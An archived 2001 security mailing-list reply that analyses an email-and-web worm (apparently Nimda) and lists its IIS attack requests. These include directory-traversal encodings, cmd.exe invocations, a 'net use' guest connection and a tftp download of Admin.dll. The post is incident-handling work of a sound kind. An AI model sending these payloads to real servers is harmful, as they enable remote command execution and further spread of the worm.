Security Incidents mailing list archives
Re: New worm ??
From: "Jay D. Dyson" <jdyson () treachery net>
Date: Tue, 18 Sep 2001 09:14:47 -0700 (PDT)
-----BEGIN PGP SIGNED MESSAGE----- On Tue, 18 Sep 2001, Cory McIntire wrote:
I and a few others I know are getting bombard on our machines with IIS requests....looks like another worm, and its much smarter than before, it seems to stay within the same class A and sometimes the same class B as the attacking machine is in. here is an excerpt of what i believe is the full scan....
Here's what I've been able to determine thus far: There is an e-mail worm propagating right now that comes with the payload 'readme.exe'. I suspect this e-mail worm preys on Outlook MUAs, but I have no confirmation of this since the e-mails I've received have been bounces. (Whoever released one iteration of this worm has the "From" address as 'staff () attrition org'.) This payload does a load of things to assure its propagation. However, it differs from other email-based worms in that it also launches a number of web-based attacks. Namely: /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 As can be seen above, it also attempts to make a tftp retrieval for Admin.dll. *sigh* Yet another worm made possible by the insecurity of Microsoft. - -Jay ( ( _______ )) )) .--"There's always time for a good cup of coffee"--. >====<--. C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) | = |-' `--' `--' `-- What doesn't kill us only makes us stronger. --' `------' -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: See http://www.treachery.net/~jdyson/ for current keys. iQCVAwUBO6dk6rlDRyqRQ2a9AQGaKwQAlDjzzfpgW0vqzLIjHj+z4rGJSYf4S8u6 adoqIruHbsmg+UpeeZsvSzmwnGzyKejmhPEo8QqTVtdh3aldssaDgoMLBAU+ryBE 2d38EPCG4Y/mGdd8mmCCYqtZu37oy4ZTmURiG9oOdERFFQ7y3W4IQUE8VifiAOCq di6p4ruu1Ic= =kS6c -----END PGP SIGNATURE----- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New worm ?? Cory McIntire (Sep 18)
- Re: New worm ?? Jay D. Dyson (Sep 18)
- RE: New worm ?? Olivier DEMBOUR (Sep 18)
- Re: New worm ?? Pedro Miller Rabinovitch (Sep 18)